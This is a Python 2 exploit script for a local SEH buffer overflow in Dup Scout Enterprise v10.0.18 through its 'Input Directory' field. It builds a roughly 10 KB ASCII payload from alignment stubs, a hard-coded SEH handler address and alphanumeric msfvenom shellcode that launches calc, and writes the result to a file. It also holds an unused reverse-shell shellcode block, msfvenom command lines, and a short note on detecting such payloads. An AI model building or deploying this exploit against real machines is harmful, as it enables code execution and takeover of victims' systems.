#!/usr/bin/python
# Python 2 script (print statements; str is used as the byte buffer).
import struct
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode
# Date: 29-11-2017
# Software: Dup Scout Enterprise
# Version: v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested on: Windows 7 x86
########################################################################################################
# Detection note: the file this PoC produces is roughly 10 KB of pure ASCII,
# dominated by long runs of 'A' (0x41), 'B' (0x42) and 'a' (0x61) with short
# alphanumeric stubs in between -- an easily recognisable pattern in input
# that is supposed to be a directory path.
'''
[+] Paso 1 Bytes Validos:
\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a
\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f
\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65
\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75
\x76\x77\x78\x79\x7a
----------
[+] Paso 2: Align ESP:
popad * 49
----------
[+] Paso 3: Assembly Align EAX:
xor eax,eax
push esp
pop eax
pop ecx
add eax 1c
jmp eax -----> (inicio shellcode)
----------
[+] Paso 4: Codificacion:
and eax,554E4D4A
and eax,2A313235
sub eax,65656565
sub eax,65654C65
sub eax,54363176
push eax
sub eax,33354D35
sub eax,2A707737
push eax
Byte Paste:
254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50
'''
# 49 single-byte popad (0x61) instructions, as listed under "Paso 2" above.
popad = "\x61"*49
# The 37-byte ASCII-only stub is the "Byte Paste" sequence from the notes
# above, written out as escapes; alignEsp is therefore 49 + 37 = 86 bytes.
alignEsp = popad+(
    "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31"
    "\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C"
    "\x65\x65\x2D\x76\x31\x36\x54\x50\x2D"
    "\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A"
    "\x50"
)
'''
msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw)
msfvenom -p windows/exec CMD=calc -e x86/alpha_mixedBufferRegister=EAX -f python
'''
# Alphanumeric payload (msfvenom windows/exec CMD=calc, per the note above).
# This is the payload that is actually placed in the buffer (see `offset`).
shellcodeTest = (
    "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A"
    "BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk"
    "42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw"
    "LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS"
    "wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam"
    "7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi"
    "QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB"
    "Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL"
    "eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA"
)
#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixedBufferRegister=EAX -f python
# NOTE(review): `shellcode` is defined but never referenced -- `offset` and
# `payload` below are built from shellcodeTest only, so this reverse-shell
# payload is dead code in the PoC as written.
shellcode= "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45"
shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b"
shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66"
shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47"
shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35"
shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f"
shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62"
shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c"
shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66"
shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71"
shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30"
shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71"
shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68"
shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d"
shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31"
shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56"
shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43"
shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50"
shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31"
shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f"
shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31"
shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58"
shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62"
shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68"
shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53"
shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30"
shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51"
shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f"
shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56"
shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58"
shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53"
shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45"
shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64"
shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c"
shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59"
shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69"
shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31"
shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76"
shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e"
shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64"
shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71"
shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38"
shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d"
shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50"
shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49"
shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78"
shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37"
shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50"
shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30"
shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"
# Pad with 'A' so that `offset` is exactly 4144 bytes. If shellcodeTest were
# ever longer than 4144 bytes the multiplier would go negative and the padding
# would silently become "", shifting nseh/seh out of position.
offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest))
nseh = "\x71\x20" # jno short 34
nseh+= "\x70\x20" # jo short 34
# NOTE(review): hard-coded handler address -- this only holds if the module
# containing it loads at a fixed base and is not SafeSEH-protected; presumably
# true for the tested Windows 7 x86 build, confirm before reusing.
seh= struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (allowed bytes)
# 26 + 86 + 6000 bytes: filler on both sides of the 86-byte alignment stub.
junk = "\x42"*26+alignEsp+"\x42"*6000
# Final layout: offset | nseh | seh | junk. With shellcodeTest fitting in
# 4144 bytes this is 4144 + 4 + 4 + 26 + 86 + 6000 = 10264 bytes, all ASCII.
payload = offset+nseh+seh+junk
print "\nSize Buffer: "+str(len(offset))
print "Size Payload: "+str(len(payload))
print "\n--------------EXPLOIT--------------\n"
# Raw payload is also echoed to stdout.
print payload
print "\n----------------------------\n"
# Written to poc_dup.txt in the current working directory. The name `file`
# shadows the Python 2 builtin of the same name; a `with open(...)` block
# would release the handle even if write() raised.
file=open('poc_dup.txt','w')
file.write(payload)
file.close()
# @s1kr10s